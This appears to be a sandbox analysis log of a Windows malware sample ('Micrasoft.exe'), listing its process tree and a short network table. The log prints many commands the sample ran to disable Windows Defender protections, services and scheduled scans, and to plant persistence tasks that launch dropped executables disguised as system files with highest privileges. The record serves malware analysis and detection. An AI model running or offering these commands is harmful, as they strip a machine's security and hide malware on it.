C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe
"C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker .bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe"
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat" "
C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe
"C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\MSBuild\winlogon.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\MSBuild\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 13 /tr "'C:\Windows\Performance\WinSAT\DataStore\SearchApp.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Windows\Performance\WinSAT\DataStore\SearchApp.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 14 /tr "'C:\Windows\Performance\WinSAT\DataStore\SearchApp.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\dllhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Default User\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\Idle.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\Idle.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\Idle.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Templates\System.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\All Users\Templates\System.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Templates\System.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\WindowsHolographicDevices\cmd.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\All Users\WindowsHolographicDevices\cmd.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\WindowsHolographicDevices\cmd.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Windows\InputMethod\SHARED\conhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\InputMethod\SHARED\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Windows\InputMethod\SHARED\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\conhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\msedge.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\msedge.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\msedge.exe'" /rl HIGHEST /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wzSW7E5aas.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe
"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\pakqiPPahT.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe
"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\oqEnL4f5pl.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe
"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\kbrh69MYEy.bat"
C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe
"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\gyyX5OxKdc.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe
"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\IxigaWiN4Z.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe
"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ATZuYpZxcK.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe
"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\3B2OAH3dio.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe
"C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe"
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe
"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\TK13bru719.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe
"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat" "
C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe
"C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\n9GQh003RW.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Portable Devices\RuntimeBroker.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Portable Devices\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\cmd.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\cmd.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\cmd.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\lsass.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\lsass.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\lsass.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Mail\cmd.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\cmd.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Mail\cmd.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 12 /tr "'C:\Windows\Panther\actionqueue\Registry.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Windows\Panther\actionqueue\Registry.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 14 /tr "'C:\Windows\Panther\actionqueue\Registry.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\dwm.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Users\Default User\dwm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\dwm.exe'" /rl HIGHEST /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CqaKHWd6Ky.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe
"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\QLJ4q7S46F.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\dwm.exe
"C:\Users\Default User\dwm.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\tlxpltA24S.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe
"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CL2HVdYORd.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\dwm.exe
"C:\Users\Default User\dwm.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ph6jqiBtuj.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe
"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\yyRUJOSyqo.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\dwm.exe
"C:\Users\Default User\dwm.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\2sHl3bGdB9.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe
"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\U04fYIssV3.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\dwm.exe
"C:\Users\Default User\dwm.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\95TPLp0dsP.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe
"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\TiDn8Em9ri.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\dwm.exe
"C:\Users\Default User\dwm.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\uLZJId2lFR.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe
"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\a1lJXnITmE.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\dwm.exe
"C:\Users\Default User\dwm.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\g1eT93LUFj.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe
"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\J6RTVEKunr.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\dwm.exe
"C:\Users\Default User\dwm.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\kUVpzpaF2i.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 95.101.143.202:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 202.143.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| GB | 88.221.135.35:443 | r.bing.com | tcp |
| GB | 88.221.135.35:443 | r.bing.com | tcp |
